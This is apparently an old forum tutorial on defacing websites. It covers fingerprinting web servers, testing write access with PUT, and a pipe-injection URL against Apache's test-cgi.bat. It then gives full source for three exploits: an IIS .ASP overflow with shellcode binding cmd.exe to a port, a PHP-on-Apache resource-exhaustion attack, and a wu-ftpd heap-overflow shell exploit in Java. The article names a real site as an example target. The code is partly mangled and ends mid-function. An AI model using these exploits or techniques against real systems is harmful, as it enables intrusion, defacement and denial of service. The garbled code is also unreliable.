Sign in or 
Share this
Hacking a website.
Defacing Websites
--------------------------------------------------------------------------------
Defacing websites is one of the most happening topic in today s IT world.
Crackers, Script Kiddies and some times hackers pave their path towards
fame by defacing websites. In most cases websites are defaced either to
spread a message among public or for fun or some other reasons.. not to mention here !!
in this article I ll explain most of the intricacies of website defacements.
Generally websites are defaced by exploiting known vulnerabilities in web
servers and gaining root shell or injecting malicious coded into the target
page residing on the server. In this manual I ll mainly describe the methods
of exploiting vulnerable Microsoft IIS web server. Though Apache is another
popular web server which is much more secure but I think I don t know much
about defacing a website hosted in Apache. But I ll try to write a theoretical
explanation of Apache servers.
This article is mainly divided into the following parts :
? Web server software detection.
? Analyzing web server configurations.
? Checking for known vulnerabilities.
? Coding exploits.
? Exploiting known vulnerabilities for Breaking into the server.
? Injecting malicious code through URL.
? Keeping yourself safe.
? Last Notes.
Web Server Detection
Defacing websites is not at all hacking. It doesn t need a hacker s brain, or a hacker s genius.
All it needs is looking for exploits, good deal of programming skill and plenty of time for
trial and error. Basically in every software there exists some vulnerabilities
(mistakes in programming) exploiting which one can get root (administrator privileged)
access to the system running that particular vulnerable software. Using this concept
websites are defaced. You can find a lots of recently discovered vulnerabilities in websites
like http://www.securityfocus.com , http://www.packetstormsecurity.com
, http://www.securiteam.com etc. some of these sites even offer exploit codes.
But before you look for exploits or vulnerabilities in those sites you need to know
which server software is running by your target website. After knowing the server
software, then only you have to look for vulnerabilities and exploits corresponding
to that particular software.
Web server detection is quite an easy but obvious method. Basically what happens
when a request is send to a web server which compelled it to generate a 400 bad request
error message, or a 200 OK message or a 404 forbidden error message in raw mode
(that is through telnet) then the server software responds with the corresponding
message which contains its web server software along with version info. So what we
need to do is just telnet into the port 80 (default port for web servers) of a web
server and send some request so that the server responds with a 400 bad request error
message or a 200 OK message which will contain the server software and version info.
Microsoft Telnet>telnet 127.0.0.1 80
GET HTTP/1.1rnrn
Host:server-software
HTTP/1.1 403 Forbidden
Date: Sat, 10 Aug 2002 16:55:41 GMT
Server: Apache/1.3.22 (Win32)
Connection: close
Content-Type: text/html; charset=iso-8859-1
403 Forbidd<br />en
Forbidden
You don't have permission to access /
on
this server.
Apache/1.3.22 Server at www.apache.org Port 80
RESS>
Connection to host lost.
Oki I hope you got it. its quite simple. In brief what you need to do is just telnet in to
port 80 of your target website (you can even telnet to the domain name ie. telnet
hackersclub.up.to 80) type in some requests like GET HTTP/1.1rnrn then type
something like Host:server-software then press quite a few times until you
get the server s response. The server will respond with its software info.
ANALYZING WEB SERVERS
Basically a default IIS (Internet Information Service) installation contains the website root at c:Inetpubwwwroot. Basically all the directories inside the directory c:Inetpub (in case of IIS and c:apache groupapachehtdocs for win32 version of Apache). All the folder inside it are regarded as Virtual Directories. In a web server each virtual directory are provided with different type of permissions. Permissions like Read, Write, Execution of Scripts, Execution of Executable like dll and server side pages like ASP, cgi etc., Directory Browsing.
In here I am going to describe the methods of analyzing the directory permission of a virtual directory residing in a web server.
Read Access : Whenever you visit a website by writing the websites domain name into your web browser then what actually happens is that you are connected to port 80 (default HTTP port) of the IP address associated with the domain name. Say the IP address of yahoo.com is 203.197.102.78. so when you write http://www.yahoo.com in your web browser address bar then what happens is that this URL (Uniform Resource Locator) is resolved to http://203.197.102.78:80/index.html (or index.htm, index.asp ,default.asp, index.jsp, default.jsp, /, default.php or whatever configured as the index page in the webserver). Now on type the URL you will be taken to the yahoo s website where you will be able to read contents from its wwwroot. If it contains executables like ASP or JSP or PHP , then those server side pages are executed and HTML is generated and passed to the browser (client) by IIS (server) or any web server dynamically. Now when you can read a document from a given directory then it indicates that the directory is readable. Basically directories containing data bases files are prohibited with read access for security reasons.
Note : if you are a real newbie who don t know about IP addressing then read my article on tracing IP to form a brief idea on IP addressing.
Write Access: As I have always suggested the members of my website to go through the RFC (request for comments) on important protocols like HTTP (Hyper Text Transfer Protocol), TELNET, FTP (File Transfer Protocol), SMTP (Simple Mail Transfer Protocol) etc, those who have read the RFC on HTTP would definitely know what is the meaning of write access in a web server. For those who haven t come across the HTTP RFC, I should give a brief description about the HTTP protocol. HTTP is a part of the TCP/IP stack (correct me if I am wrong). It was designed and developed with the intension of sharing files across the internet as it obvious from the name as HTTP stands for Hyper Text Transfer Protocol. Initially files can be uploaded and downloaded from the server according to the HTTP protocol without the need of any type of authentication. Soon it was realized that this kind of architecture is a real security threat cause anybody with half brains can have write access to a particular server. Now what was done is that web servers are designed and configured as such to give write access to only selected virtual directories.
Try telnet in to a website and play around with it to get some practical information about the servers and their behaviors. Here s a list of commonly used commands supported by a web serve according to RFC of HTTP.
GET : used to send request for read access to a file residing on the server by the browser (client)
Example :
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
GET /index.html HTTP/1.1rnrn
Output:
The HTML source of the index.html page residing on the server will be returned or if requested for an ASP or JSP or any server side executable page.. then the dynamically generated HTML will be displayed.
PUT : used to create a file on the server.. requires write access on the specified virtual directory where the file is to be created..
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
PUT /analyzing.txt HTTP/1.1rnrn
Output :
Most probably or better to say definitely you will get a 403 Forbidden Error.. as it is obvious that the wwwroot will never have write access..
DEL : for deleting a page on the webserver.. requires write access on the specified virtual directory where the file is to be deleted..
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
del /index.html HTTP/1.1rnrn
Output :
Most probably or better to say definitely you will get a 403 Forbidden Error.. as it is obvious that the wwwroot will never have write access..
ECHO : the printing tool.. same as used in DOS Batch Files.. The output can be redirected..
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
ECHO defaced by Abhisek Datta >> /index.html HTTP/1.1rnrn
PROPFIND : used as a request for directory browsing..(for IIS.. actually its an administrative tool used for web server analysis)
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
PROPFIND / HTTP/1.1
Host:iis-server
Content-Length:0
Output :
Most probably or better to say definitely you will get a 403 Forbidden Error.. as it is obvious that the wwwroot will never have write access..
To test the write access permission for a directory in Microsoft IIS in a little advanced way. Follow the method follows :
To test if write permission is enabled for anonymous web clients telnet into the web server port usually TCP port 80 and make the following request:
PUT /scripts/abhisek.asp HTTP/1.1
Host: iis-server
Content-Length: 10
At this stage the server should respond with a 100 Continue message.
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
On receiving this type 10 letters
AAAAAAAAAA
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK
If the server responds with this 201 Created response then the write permission is enabled.
Execution Access : Server side pages (ASP, JSP, PHP) ,dll (dynamic link libraries) etc often used in today s highly advanced database driven dynamic websites which dynamically generates the HTML and send it to the client (browser). These server side pages and other executables including dll and exe files needs execution privileges in the virtual directory where they are kept. Generally all the dll , asp, exe files which needs execution privileges are kept in a single virtual directory.
Directory Browsing : Often web servers (or to be more specific.. virtual directories of a web server) are configured as such to provide directory browsing access to all clients or special clients through proper authentications. Basically directory browsing means you can list the files and folders present in your specified virtual directory just as you see in your computer. For security reasons most of the production level websites turn of this feature. But exploits can be used to get a directory listing of a virtual directory.
Exploit for Directory Listing in Apache (win32) :
One of the most preferred web server Apache (win32) 2.1.x (I am not sure about the version) by default contains a .bat file named test-cgi.bat in its cgi-bin directory. It was actually provided so that system administrators can test the privileges of cgi-bin directory which contains all the cgi and perl script. Obviously this cgi-bin virtual directory has execution permission. This conditions are exploited to perform out attack. Basically when a .bat file in win32 version of Apache web server is called for execution a DOS (Disk Operating System) shell is spawned to it for execution. Now we can use | (pipe) character along with the batch file call name to execute commands on the remote server. The attack URL will be something like this :
http://www.target.com/cgi-bin/test-c...shttpd.c onf
So by this attack URL what I have done is copied the httpd.conf file from the conf directory which hardly has read access to the Apache web root ie. htdocs virtual folder. Now we can easily download the httpd.conf file using the URL http://target.com/httpd.conf since now it resides in the apache web root.
Note: For those who are not acquainted with Apache and don t know what httpd.conf file is Well in Apache you have to configure you entire web server using commands and scripts which are kept in httpd.conf file in c:apache groupapacheconf folder of default apache installation on a typical windows system. This file contains all the settings of the target web server and by some how if we can manage to get our hands on this file then we can have clear idea about all the settings of the web server including the location of log files, directory permissions, write access, authentication levels etc etc.
CHECKING FOR KNOWN VULNERABILITY
Mostly websites are defaced and hacked using vulnerabilities associated with the server software or the Operating System running the server software. Most of the so called hackers deface websites using the vulnerabilities found by peoples who deserve being called Hackers . I guess you must be knowing what a vulnerability is. Its actually an existing flaw in the software architecture which will allow a hacker or a malicious cracker to take control over the system or issue arbitrary system commands to the server. There are a hell of of vulnerabilities exists in almost all softwares. Basically in old days I have heard that hackers used to find out flaw and vulnerabilities in softwares by their own. But today I guess there are very few peoples who does so. There are so many good sites like :
http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
these sites contains more than enough latest vulnerabilities which will help you getting
started. Even if you are experienced I am sure you ll get a lot of help from these sites.
CODING EXPLOITS :
Say you are targeting to hack the website http://www.anisurrahman.net
(goss!! Anisur will kick my ass if he read this article).
Using the methods described above you can easily find that the website
is running on Microsoft IIS 5.00 server software.
Now the time is to look for exploits (I am considering you not to be a
hacker who can find his own vulnerabilities.. if you do so.. you don t need to
read this article.). even if you find some overflow or malloc vulnerability in
the web server software from the above mentioned sites you need to write programs
(generally in C or Perl) to implement the exploit for the said vulnerability.
For this definitely you need to have a very good knowledge about programming
with Socket Coding background. If if you cant code you own exploits you can
download exploits coded in languages like C , Perl , JAVA (rarely).
But hey if you download a great exploit which claims to get you root shell
on the target web server written in C, then while compiling it I am sure you ll
find a lot of errors cause C syntaxes and functions differs somewhat from compiler
to compiler. Now you will realize the need for quite a lot programming background
with pretty good knowledge of programming.
Here s a list of some known vulnerabilities and exploits coded for it :
1. This .ASP overflow exploit will open port 1111 and bind the cmd.exe to it.
It should be noted is that every time you run this exploit and a message will
show that this exploit works perfectly. However, that does not mean you can get
the access to the target host, the reason is that on some occasions there will
be a message-box appear on victim's terminal screen showing that an AV (Access Violation
) has occurred.
/* Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD http://www.chinansl.com
keji@chinansl.com
use MS VC++ to compile this piece of code
*/
#include "stdafx.h"
#include
#include
#include
#include
#pragma comment (lib,"Ws2_32")
int main(int argc, char* argv[])
{
if(argc != 4)
{
printf("%s ip port aspfilepathnn",argv[0]);
printf(" ie. %s 127.0.0.1 80 /iisstart.aspn",argv[0]);
puts(" programed by keji@chinansl.com");
return 0;
}
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
DWORD jmpaddr=0x00457494; //0x77ebf094;/ /0x01e6fcec; //"x1cxfbxe6x01"; //"x0cxfbxe6x01";
char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
char* pad="xccxccxccxcc" "ADPA" "x02x02x02x02" "PADP"; //16 bytes
WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
{
puts("WSAStartup() error");
return -1;
}
struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
{
puts("Socket create error");
return -1;
}
if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
{
puts("Cannot connect to the specified host");
return -1;
}
char buff[4096];
char* shellcode="x55x8bxecx33xc0xb0xf0xf7xd8x0 3xe0x8bxfcx33xc9x89"
"x8dx2cxffxffxffxb8x6bx65x72x6exabxb8 x65x6cx33x32"
"xabx32xc0xaaxb8x77x73x6fx63xabxb8x6b x33x32x2exab"
"x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2e xabx32xc0x4f"
"xaaxb8x23x80xe7x77x8dx9dx10xffxffxff x53xffxd0x89"
"x45xfcxb8x23x80xe7x77x8dx9dx19xffxff xffx53xffxd0"
"x89x45xf8xbbx4bx56xe7x77x6ax47xffx75 xfcxffxd3x89"
"x45xf4x6ax48xffx75xfcxffxd3x89x45xf0 x33xf6x66xbe"
"x1dx02x56xffx75xfcxffxd3x89x45xecx66 xbex3ex02x56"
"xffx75xfcxffxd3x89x45xe8x66xbex0fx03 x56xffx75xfc"
"xffxd3x89x45xe4x66xbex9dx01x56xffx75 xfcxffxd3x89"
"x85x34xffxffxffx66xbexc4x02x56xffx75 xfcxffxd3x89"
"x85x28xffxffxffx33xc0xb0x8dx50xffx75 xfcxffxd3x89"
"x85x18xffxffxffx6ax73xffx75xf8xffxd3 x89x45xe0x6a"
"x17xffx75xf8xffxd3x89x45xdcx6ax02xff x75xf8xffxd3"
"x89x45xd8x33xc0xb0x0ex48x50xffx75xf8 xffxd3x89x45"
"xd4x6ax01xffx75xf8xffxd3x89x45xd0x6a x13xffx75xf8"
"xffxd3x89x45xccx6ax10xffx75xf8xffxd3 x89x45xc8x6a"
"x03xffx75xf8xffxd3x89x85x1cxffxffxff x8dx7dxa0x32"
"xe4xb0x02x66xabx66xb8x04x57x66xabx33 xc0xabxf7xd0"
"xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfe xc8xabx33xc0"
"xabx40xabx8dx45xb0x50x33xc0x66xb8x01 x01x50xffx55"
"xe0x33xc0x50x6ax01x6ax02xffx55xdcx89 x45xc4x6ax10"
"x8dx45xa0x50xffx75xc4xffx55xd8x6ax01 xffx75xc4xff"
"x55xd4x33xc0x50x50xffx75xc4xffx55xd0 x89x45xc0x33"
"xffx57x8dx45x8cx50x8dx45x98x50x8dx45 x9cx50xffx55"
"xf4x33xffx57x8dx45x8cx50x8dx45x90x50 x8dx45x94x50"
"xffx55xf4xfcx8dxbdx38xffxffxffx33xc9 xb1x44x32xc0"
"xf3xaax8dxbdx38xffxffxffx33xc0x66xb8 x01x01x89x47"
"x2cx8bx45x94x89x47x38x8bx45x98x89x47 x40x89x47x3c"
"xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50 x8dx85x38xff"
"xffxffx50x53x53x53x6ax01x53x53x8dx4d x80x51x53xff"
"x55xf0x33xc0xb4x04x50x6ax40xffx95x34 xffxffxffx89"
"x85x30xffxffxffx90x33xdbx53x8dx85x2c xffxffxffx50"
"x53x53x53xffx75x9cxffx55xecx8bx85x2c xffxffxffx85"
"xc0x74x49x33xdbx53xb7x04x8dx85x2cxff xffxffx50x53"
"xffxb5x30xffxffxffxffx75x9cxffx55xe8 x85xc0x74x6d"
"x33xc0x50xffxb5x2cxffxffxffxffxb5x30 xffxffxffxff"
"x75xc0xffx55xccx83xf8xffx74x53xebx10 x90x90x90x90"
"x90x90x6ax32xffx95x28xffxffxffxebx99 x90x90x33xc0"
"x50xb4x04x50xffxb5x30xffxffxffxffx75 xc0xffx55xc8"
"x83xf8xffx74x28x89x85x2cxffxffxffx33 xc0x50x8dx85"
"x2cxffxffxffx50xffxb5x2cxffxffxffxff xb5x30xffxff"
"xffxffx75x90xffx55xe4x85xc0x74x02xeb xb4xffx75xc4"
"xffx95x1cxffxffxffxffx75xc0xffx95x1c xffxffxffx6a"
"xffxffx95x18xffxffxff";
char* s1="POST ";// HTTP/1.1rn";
char* s2="Accept: */*rn";
char* s4="Content-Type: application/x-www-
form-urlencodedrn";
char* s5="Transfer-Encoding:
chunkedrnrn";
char* sc="0rnrnrn";
char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;
char sendbuff[1024*16];
memset(sendbuff,0,1024*16);
sprintf(sendbuff,"%s%s?%s HTTP/1.1rn%sHost: %srn%s%s10rn%srn4rnAAAArn4rnBBBBrn%s ", s1, destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);
int sendlen=strlen(sendbuff);
*(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;
result=send(s,sendbuff,sendlen,0);
if(result == -1 )
{
puts("Send shellcode error!");
return -1;
}
memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);
if(strstr(buff,"") != NULL)
{
shutdown(s,0);
closesocket(s);
puts("Send shellcode error!Try again!");
return -1;
}
shutdown(s,0);
closesocket(s);
printf("nUse to connect to the hostn",destIP);
puts("If you cannot connect to the host,try run this program again!");
return 0;
}
------------------------------------------------------------------------
2.
/* PHP-APACHE.C
* By Matthew Murphy
* Exhaust CGI Resources via PHP on Apache
*
* Calling PHP with no parameters causes it to
* never terminate; the process must be killed
* by the server, the OS, or the admin.
*
* PHP on Apache requires you to configure a
* virtual to load PHP out of. PHP implements
* a "cgi.force_redirect" value to require that
* a certain environment variable be set to
* allow PHP to run further.
*
* However, an empty command-line *still* will
* cause PHP to hang. If a remote user does
* this for a lengthy amount of time, the server
* may no longer launch PHP or other server-side
* components.
*
* NOTE: The vulnerable config is on Apache,
* but other servers can still be exploited
* if they offer PHP.EXE (or an SAPI) directly.
*
* Usage: php-apache [phpbin] [port] [maxsocks]
*/
#include
#include
#ifdef _WIN32
#define _WINSOCKAPI_ /* Fix for Winsock.h redef errors */
#include /* WinSock API calls... */
#define WSA_VER 0x0101 /* WinSock ver. to use */
#pragma comment(lib, "wsock32.lib") /* Check your compiler's docs... */
#else
#include
#include
#include
#include
#include
#include
#include
#endif
#define DEF_PHP "/php/php" /* This is used as the PHP
* path if one isn't set
*/
static char php_buf[] = "GET %s HTTP/1.0x0dx0ax0dx0a";
void main(int argc, char *argv[]) {
char host[257];
char binpath[257];
int maxsocks;
char request[300];
unsigned short port;
struct hostent *he;
struct sockaddr_in sa_in;
#ifdef _WIN32
WSADATA wsa_prov;
SOCKET s;
#else
int s;
#endif
printf("PHP-APACHE.C by Matthew Murphyx0dx0a");
printf("Exhausting CGI resources w/ PHP on Apachex0dx0ax0dx0a");
maxsocks = 0;
strcpy(&binpath[0], DEF_PHP);
#ifdef _WIN32
if (!WSAStartup(WSA_VER, &wsa_prov) == 0) {
printf("ERROR: Windows Sockets init failed!");
exit(1);
}
#endif
port = (unsigned short)htons(80);
switch (argc) {
case 5:
maxsocks = atoi(argv[4]);
case 4:
port = htons((unsigned short)atoi(argv[2]));
case 3:
if (strlen(argv[2]) > 256) {
printf("ERROR: 256 char path limit exceeded in 'phpbin' argument.");
exit(1);
}
strcpy(&binpath[0], argv[2]);
case 2:
if (strlen(argv[1]) > 256) {
printf("ERROR: No host should be over 256 chars!");
exit(1);
}
strcpy(&host[0], argv[1]);
break;
default:
printf("Usage: php-apache [port] [maxsocks] [phpbin]x0dx0ax0dx0ahost - The IP/DNS name to attackx0dx0aport - The port the HTTP service normally runs on (default: 80)x0dx0amaxsocks - The maximum number of connections to establish (creates a finite flood). A zero value means continue until termination (default: 0)x0dx0aphpbin - The virtual path to the PHP binary (e.g, /php/php[.exe]; default: /php/php)");
exit(0);
}
if (maxsocks == 0) {
maxsocks--;
}
sa_in.sin_family = AF_INET;
sa_in.sin_port = (unsigned short)port;
he = gethostbyname(&host[0]);
if (he == NULL) {
printf("ERROR: DNS resolution failed, or unknown host.");
exit(1);
}
#ifdef _WIN32
sa_in.sin_addr.S_un.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#else
sa_in.sin_addr.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#endif
sprintf(&request[0], &php_buf[0], &binpath[0]);
while (!maxsocks == 0) {
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Couldn't create socket...x0dx0aIf you continue to receive this error, terminate the program.");
} else {
if (!connect(s, (const struct sockaddr FAR *)&sa_in, sizeof(struct sockaddr_in)) == 0) {
printf("Couldn't connect...x0dx0aIf you continue to receive this error, terminate the program.");
} else {
send(s, (char FAR *)&request[0], strlen(&request[0]), 0);
/* If the exploit isn't using up server resources
* try removing this -- the server may be killing
* the CGI after a disconnect.
*/
#ifdef _WIN32
shutdown(s, SD_BOTH);
closesocket(s);
#else
close(s);
#endif
}
}
if (!maxsocks == -1) {
maxsocks--;
}
}
return;
}
------------------------------------------------------------------------
3. /*
* wu-ftpd 2.6.[0/1] remote heap overflow exploit
* wu-ftpd 2.5.* does also overflow and disconnect when you "cwd ~{"
* but it does not seem to be exploitable for some reason...
*
* Original Code by zen-parse
* This code was finished by CraigTM at 23-01-2002
*
* thanks to Krissa from #java@efnet for this:
* From the Integer API docs: Integer.parseInt("-FF", 16) returns -255
*
* thanks to dvorak for inspiring me; it works() now wink.gif
*
* This works (nearly) like zen-parses code, but gives you a shell...
*
* I wanted to challenge myself and prove that remote exploits can be
* done with java...(hello pr0ix!)...I also had way too much time wink.gif
*
* java woot [IP] {heap}
*
* CraigTM [ElectronicSouls]
*
* P.S.: I know that the Reader/Write class sucks, but it was done within minutes wink.gif
* P.P.S.:Have fun with the new targets wink.gif
*
*/
import java.io.*;
import java.net.*;
import java.util.*;
class woot
{
//type, got, inpbuf, string to check for (autodetect)
static String targets[] =
{
"RH7.0 - 2.6.1(1) Wed Aug 9 05:54:50 EDT 2000", // by zen-parse
"08070cb0","08084600","2.6.1(1) WED AUG 9 05:54:50 EDT 2000",
"RH7.2 - wu-2.6.1-18 by kanix - verified by CraigTM", // doesnt seem to be
"08072af8","08085900","WU-2.6.1-18", // exploitable...
//"wu-2.6.1(2) by zen-parse", // zen-parse's common compile
//"0806ca48","0807e380","WU-2.6.1(2)", // seems useless in the wild
"wu-2.6.0(x) from www.wu-ftpd.org by CraigTM", //done by me
"0806bae4","0807d600","WU-2.6.0(",
"wu-2.6.1(x) from www.wu-ftpd.org by CraigTM", //done by me
"0806c028","0807db40","WU-2.6.1(",
null
};
//socket stuff
static DataInputStream sin;
static PrintStream sout;
static Socket s = null;
//shellcode
static char sc[]={0x55,0x89,0xe5,0x31,0xc0,0x31,0xdb,0x31,0xc9,0xb 0,0x17,0xcd,0x80,0xb0,0x2e,0xcd,0x80,0xeb,0x43,0x5 e,0xb0,0x27,0x8d,0x5e,0x09,0xb1,0xed,0xcd,0x80,0x3 1,0xc9,0x31,0xc0,0xb0,0x3d,0xcd,0x80,0xba,0x2e,0x2 e,0x2f,0xff,0x8d,0x5d,0x04,0xb1,0x10,0x89,0x55,0x0 4,0x83,0xc5,0x03,0xe0,0xf8,0x89,0x4d,0x04,0xb0,0x3 d,0xcd,0x80,0x89,0xf3,0x89,0x75,0x08,0x89,0x4d,0x0 c,0xb0,0x0b,0x8d,0x4d,0x08,0x8d,0x55,0x0c,0xcd,0x8 0,0x31,0xc0,0xb0,0x01,0xcd,0x80,0xe8,0xb8,0xff,0xf f,0xff};
static int sclength=91;
//guess what?
static String victim="";
//your shell
static Thread reader, writer;
//vars
static int m=0;
static long tmp_got;
static long tmp_heap;
static long tmp_inpbuf;
void connect(String Server)
{
try
{
s = new Socket(Server, 21);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());
}//try
catch (IOException e){System.out.println("Error Connecting:"+e);System.exit(-1);}
}//connect()
boolean allowsAnonymous()
{
String line=null;
try
{
connect(victim);
System.out.print(".");
boolean Ano=false;
if(s!=null)sout.println("USER planetsubhro");
System.out.print(".");
while(true)
{
if(s==null)break;
line=sin.readLine();
if(line==null)break;
if(line.indexOf("220")<=-1)
break;
line=line.toUpperCase();
for(int i=0;targets[i]!=null;i++)
{
if(line.indexOf(targets[i])>-1)
{
m=(i/4)+1;
break;
}
}
System.out.print(".");
if(s!=null)
{
sout.println("PASS sms1324");
sout.println("QUIT");
}
while(Ano==false)
{
line=sin.readLine();
if(s==null || line==null)break;
if(line.indexOf("331")>-1)
{
line=sin.readLine();
if(line==null || s==null)break;
}
if(line.indexOf("230")>-1)
return true;
if(line.indexOf("530")>-1 || line.indexOf("531")>-1)
return false;
}//while (Ano==false)
}//while(true)
//close socket again
if(s!=null)
{
try
{
s.close();s=null;sin=null;sout=null;
}
catch(IOException e){}
}
}//try
catch (IOException e){}
return false;
}//Anonymous check + get server
void shell()
{
reader.setPriority(6);
writer.setPriority(5);
reader.start();
writer.start();
Thread t = Thread.currentThread();
try {t.sleep(1000);} catch (InterruptedException e) {}
woot.sout.println("uname -a;id;");
}
void dosend(String s)
{
for(int i=0;i
{
if(s.charAt(i)==0xff)
sout.print(s.charAt(i));
sout.print(s.charAt(i));
}
}
void getTarget()
{
try
{
System.out.print("@@ Server>");
DataInputStream in = new DataInputStream (System.in);
victim=in.readLine();
}
catch (IOException e){}
}//getTarget()
boolean works(long n)
{
String v0=Long.toHexString(n);
String elements[]=new String[5];
elements[0]=v0.substring(0,2);
elements[1]=v0.substring(2,4);
elements[2]=v0.substring(4,6);
elements[3]=v0.substring(6,8);
for(int i=0;elements[i]!=null;i++)
{
if(elements[i].equals("00"))return false; //0x00 -> null byte
if(elements[i].equals("0a"))return false; //0x0a -> n
if(elements[i].equals("40"))return false; //0x40 -> @
}
return true;
}
boolean force()
{
char ok;
long l;
long got,inp;
long en=0+(256*1024);
long st=2048;
System.out.println("++ Option #"+m+" chosen.");
m=(m-1)*4;
System.out.println("++ Exploiting "+targets[m]+"n");
long tmp = Long.parseLong(targets[m+2],16);
st= st + tmp + Long.parseLong("6400", 16);
en= en + tmp + Long.parseLong("6400", 16);
got=Long.parseLong(targets[m+1],16);
inp=Long.parseLong(targets[m+2],16);
tmp_got=got-12;
tmp_inpbuf=inp+20;
System.out.println("got:t"+Long.toHexString(tmp_g ot+12)+"ninpbuf:t"+Long.toHexString(tmp_inpbuf-20));
System.out.println("brute forcing heap (from "+Long.toHexString(st)+" to "+Long.toHexString(en)+"):");
for(l=st;l
{
for(m=0;(m!=16&&m<32);m+=4)
{
if(works(m+l+st))
{
System.out.print(".");
tmp_heap=l+m;
if(exploit("scan"))
{
System.out.println("nheap:t"+Long.toHexString(tm p_heap)+"n");
System.out.println("nTrying to get shell...");
return true;
}
}
else // if(!works(m+l+st))
System.out.print("*");
}//for
}//for
return false;
}//force()
boolean exploit(String mode)
{
StringBuffer buf=new StringBuffer();
StringBuffer buf2=new StringBuffer("");
String got[] = new String[5];
String heap[] = new String[5];
String inpbuf[]=new String[5];
String hexgot = Long.toHexString(tmp_got);
String hexheap = Long.toHexString(tmp_heap);
String hexinpbuf = Long.toHexString(tmp_inpbuf);
//////////////////// PUT THE GOT ADDRESS ///////////////////////////
if(hexgot.length()==7)
{
got[0] = "0"+hexgot.substring(0,1);
got[1] = hexgot.substring(1,3);
got[2] = hexgot.substring(3,5);
got[3] = hexgot.substring(5,7);
}
if(hexgot.length()==8)
{
got[0] = hexgot.substring(0,2);
got[1] = hexgot.substring(2,4);
got[2] = hexgot.substring(4,6);
got[3] = hexgot.substring(6,8);
}
//////////////////// PUT THE HEAP ADDRESS ///////////////////////////
if(hexheap.length()==7)
{
heap[0] = "0"+hexheap.substring(0,1);
heap[1] = hexheap.substring(1,3);
heap[2] = hexheap.substring(3,5);
heap[3] = hexheap.substring(5,7);
}
if(hexheap.length()==8)
{
heap[0] = hexheap.substring(0,2);
heap[1] = hexheap.substring(2,4);
heap[2] = hexheap.substring(4,6);
heap[3] = hexheap.substring(6,8);
}
//////////////////// PUT THE INPBUF ///////////////////////////
if(hexinpbuf.length()==7)
{
inpbuf[0] = "0"+hexinpbuf.substring(0,1);
inpbuf[1] = hexinpbuf.substring(1,3);
inpbuf[2] = hexinpbuf.substring(3,5);
inpbuf[3] = hexinpbuf.substring(5,7);
}
if(hexinpbuf.length()==8)
{
inpbuf[0] = hexinpbuf.substring(0,2);
inpbuf[1] = hexinpbuf.substring(2,4);
inpbuf[2] = hexinpbuf.substring(4,6);
inpbuf[3] = hexinpbuf.substring(6,8);
}
//fill buffer with nops
for(int i=0;i!=480;i++)
buf2.append((char)0x90);
// fill the buffer with chunks. overwrites the syslog call pointer with
// address of our shellcode.
for(int l=0;l<460;l+=16)
{
buf2.setCharAt(l+0,(char)Integer.parseInt("F0", 16));
buf2.setCharAt(l+1,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+2,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+3,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+4,(char)Integer.parseInt("F0", 16));
buf2.setCharAt(l+5,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+6,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+7,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+8,(char)Integer.parseInt(got[3], 16));
buf2.setCharAt(l+9,(char)Integer.parseInt(got[2], 16));
buf2.setCharAt(l+10,(char)Integer.parseInt(got[1], 16));
buf2.setCharAt(l+11,(char)Integer.parseInt(got[0], 16));
buf2.setCharAt(l+12,(char)Integer.parseInt(inpbuf[3], 16));
buf2.setCharAt(l+13,(char)Integer.parseInt(inpbuf[2], 16));
buf2.setCharAt(l+14,(char)Integer.parseInt(inpbuf[1], 16));
buf2.setCharAt(l+15,(char)Integer.parseInt(inpbuf[0], 16));
}
buf.append("user ftpnpass http://mp3.com/cosv ");
buf.append((char)Integer.parseInt(heap[3], 16)+""+(char)Integer.parseInt(heap[2], 16)+""+(char)Integer.parseInt(heap[1], 16)+""+(char)Integer.parseInt(heap[0], 16));
buf.append("n");
connect(victim);
dosend(buf.toString());
